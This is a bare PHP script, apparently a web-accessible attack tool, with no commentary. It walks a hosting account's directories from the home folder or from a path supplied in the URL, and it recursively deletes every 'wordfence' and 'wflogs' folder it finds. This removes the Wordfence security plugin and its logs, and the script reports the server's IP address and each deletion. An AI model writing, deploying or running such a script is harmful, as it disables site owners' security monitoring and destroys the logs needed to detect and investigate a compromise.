<?php
// Helper function to delete directories recursively
function deleteDirectory($dir) {
    if (!is_dir($dir)) {
        return false;
    }
    $items = scandir($dir);
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }
        $path = $dir . '/' . $item;
        if (is_dir($path)) {
            deleteDirectory($path);
        } else {
            unlink($path);
        }
    }
    return rmdir($dir);
}

// Recursive function to traverse directories and delete specific directories
function findAndDelete($path, $currentDepth, $maxDepth) {
    if ($currentDepth > $maxDepth) {
        return;
    }

    $dirs = scandir($path);
    foreach ($dirs as $dir) {
        if ($dir === '.' || $dir === '..') {
            continue;
        }
        $fullPath = $path . '/' . $dir;
        if (is_dir($fullPath)) {
            // Check if this directory is one of the targets
            if ($dir === 'wflogs' || $dir === 'wordfence') {
                if (deleteDirectory($fullPath)) {
                    echo "Deleted : $fullPath<br>";
                }
            } else {
                // Recurse into this directory
                findAndDelete($fullPath, $currentDepth + 1, $maxDepth);
            }
        }
    }
}

// Determine the starting directory
if (!function_exists('posix_getpwuid')) {
    if (isset($_GET["path"])) {
        $home = $_GET["path"];
    } else {
        echo getcwd() . "<br>posix function is not available<br>Please Input Path";
        exit;
    }
} else {
    echo $_SERVER['SERVER_ADDR'] . "<br>";

    if (isset($_GET["path"])) {
        $home = $_GET["path"];
    } else {
        $arr = posix_getpwuid(posix_getuid());
        $home = $arr["dir"];
    }
}

// Start the directory deletion process
findAndDelete($home, 0, 10);
?>
